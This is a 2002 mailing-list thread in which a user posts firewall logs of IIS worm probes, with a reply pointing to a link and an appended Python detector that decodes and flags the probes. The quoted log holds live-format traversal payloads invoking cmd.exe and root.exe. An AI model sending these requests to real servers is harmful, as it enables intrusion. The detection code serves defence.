Re: Can someone tell me what this is exactly?

From: John Cesta (lists@lookwww.com)
Date: 03/13/02


Read this:

http://www.serverautomationtools.com/webcgi/webbatch.exe?techsupt/tsleft.web+MS-Security-Virus-Hacks-links+Do-your-logfiles-contain-this.html

John Cesta

http://www.cybersmarts.net
-------------------------------------------
ColdFusion ASP and ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
---------------------------------
LogFileManager - An IIS Logfile Management Tool
WebPageChecker - Minimize Server Downtime
DomainReportIt PRO - Helps Convert IIS Installs
http://www.serverautomationtools.com

On Wed, 13 Mar 2002 15:07:52 +1100, sg1 <news@nospam.com> wrote:

>Every time I connect to the net with my nt4 ws box I am bombarded with
>scans and portmaps, most of which are inconsequential.
>But port 80 connections seem to get through. This is a concern. Here is
>a sample of the logs.
>
>
>[01/16/2002 10:01:45.483 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:01:46.765 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:09:56.670 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:09:56.770 GMT+1100] GET /scripts/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:11:25.447 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:11:26.419 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:11:26.529 GMT+1100] GET /MSADC/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:12:56.218 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:12:57.189 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:12:57.389 GMT+1100] GET /c/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:14:26.938 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:14:27.930 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:14:28.070 GMT+1100] GET /d/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:15:57.679 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:15:58.770 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:15:59.001 GMT+1100] GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:17:28.459 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:17:29.701 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:17:30.672 GMT+1100] GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:19:01.693 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:19:03.015 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:19:03.105 GMT+1100] GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:20:32.464 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:20:33.465 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:20:34.346 GMT+1100] GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:22:04.857 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:22:07.130 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:22:07.220 GMT+1100] GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:22:15.151 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:22:15.232 GMT+1100] GET /scripts/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:23:35.647 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:23:36.669 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:23:36.749 GMT+1100] GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:23:44.890 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:23:46.152 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:23:46.252 GMT+1100] GET /MSADC/root.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:25:06.448 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:25:07.469 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:25:07.559 GMT+1100] GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:25:16.112 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:25:20.378 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:25:20.508 GMT+1100] GET /c/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:26:37.188 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:26:38.210 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:26:38.290 GMT+1100] GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:26:50.127 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:26:51.819 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:26:52.190 GMT+1100] GET /d/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:28:07.939 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:28:08.890 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:28:09.060 GMT+1100] GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:28:22.99 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:28:23.812 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:28:23.882 GMT+1100] GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:29:38.689 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:29:39.711 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:29:39.821 GMT+1100] GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:29:54.242 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:29:55.864 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:29:55.954 GMT+1100] GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:31:09.490 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:31:10.361 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:31:10.441 GMT+1100] GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:31:25.503 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:31:29.879 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:31:29.999 GMT+1100] GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:32:40.170 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:32:41.111 GMT+1100] Connection: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:32:41.202 GMT+1100] GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>Host: www
>Connnection: close
>
>
>[01/16/2002 10:32:59.197 GMT+1100] Disconnect: kookminpc.com
>(203.234.206.7) on port 80 (tcp).
>[01/16/2002 10:33:04.705 GMT+1100] Connection: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:33:04.806 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>[01/16/2002 10:34:10.931 GMT+1100] Disconnect: p94-tnt1.brs.ihug.com.au
>(203.173.188.94) on port 80 (tcp).
>
>This is just a half hour's worth of logs, but you can see that once
>connected they are actually executing commands.
>
>Any help interpreting this or advice would be appreciated.
>AdvThanksAnce,
>
>Sg1
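The requests quoted above (root.exe under /scripts and /MSADC, cmd.exe reached through `..%255c..`, `..%c0%af..`, `..%c1%1c..` and `..%%35%63..`) are the IIS Unicode traversal (MS00-078) and double-decode (MS01-026) probes the Nimda worm sent, misspelled `Connnection: close` header included. As an added example that is not part of this thread, the following Python reads the log format shown in sg1's post, canonicalizes each request target the way the unpatched IIS decoder would have, and flags the traversal and root.exe probes so a defender can count them rather than read them by hand. The sample log is constructed from the quoted lines; the function names are my own.

```python
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed sample in the shape of the quoted log (host, IP and request strings taken from the post).
SAMPLE_LOG = """\
[01/16/2002 10:09:56.670 GMT+1100] Connection: kookminpc.com (203.234.206.7) on port 80 (tcp).
[01/16/2002 10:09:56.770 GMT+1100] GET /scripts/root.exe?/c+dir HTTP/1.0
[01/16/2002 10:15:59.001 GMT+1100] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[01/16/2002 10:20:34.346 GMT+1100] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[01/16/2002 10:23:36.749 GMT+1100] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[01/16/2002 10:28:09.060 GMT+1100] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[01/16/2002 10:40:00.000 GMT+1100] GET /index.html HTTP/1.0
"""
REQUEST_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] (?P<method>[A-Z]+) (?P<target>\S+) HTTP/")

def lenient_utf8(raw: bytes) -> str:
    """Fold two-byte sequences like the unpatched IIS decoder (MS00-078): a 0xC0-0xDF lead
    byte plus ANY next byte -> ((b1 & 0x1F) << 6) | (b2 & 0x3F), so the overlong %c0%af
    becomes '/' and %c1%9c or %c1%1c become '\\' even though none of them is valid UTF-8."""
    out, i = [], 0
    while i < len(raw):
        if 0xC0 <= raw[i] <= 0xDF and i + 1 < len(raw):
            out.append(chr(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(raw[i]))
            i += 1
    return "".join(out)

def canonicalize(target: str) -> str:
    """Decode twice (MS01-026 double decode: %255c -> %5c -> '\\', %%35%63 -> %5c -> '\\'),
    apply the lenient fold, then treat backslash as slash so the '..' hops become visible."""
    path = target.split("?", 1)[0]                    # drop the ?/c+dir command argument
    return lenient_utf8(unquote_to_bytes(unquote_to_bytes(path))).replace("\\", "/").lower()

def classify(target: str) -> Optional[str]:
    canon = canonicalize(target)
    if canon.endswith("/root.exe"):
        return "root.exe probe (cmd.exe copy left behind by an earlier compromise)"
    if ".." in canon.split("/") and canon.endswith("/cmd.exe"):
        return "directory traversal to cmd.exe"
    return None

def scan(log: str):
    """Return (timestamp, raw target, verdict) for every request line that is a probe;
    Connection:/Disconnect: lines carry no request and do not match REQUEST_RE."""
    hits = [(m["ts"], m["target"], classify(m["target"]))
            for m in map(REQUEST_RE.match, log.splitlines()) if m]
    return [h for h in hits if h[2]]
```

Calling `scan(SAMPLE_LOG)` flags the five probe lines and leaves `/index.html` alone; all five cmd.exe variants canonicalize to the same `/scripts/../../winnt/system32/cmd.exe` shape, which is why a filter that only looks at the raw URL string misses most of them.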


